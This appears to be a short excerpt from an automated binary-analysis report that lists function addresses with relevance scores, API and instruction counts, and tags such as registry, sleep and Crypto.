Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12
fileCOMMON

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12
libraryCOMMON

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11
registryCOMMON

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16
COMMON

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12
sleepCOMMON

Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12
COMMON

Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12
COMMON

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138
COMMON

Function 0040549C Relevance: .1, Instructions: 146
COMMONCrypto

Function 004029D4 Relevance: .1, Instructions: 77
COMMONCrypto

Function 0040317B Relevance: .0, Instructions: 46
COMMON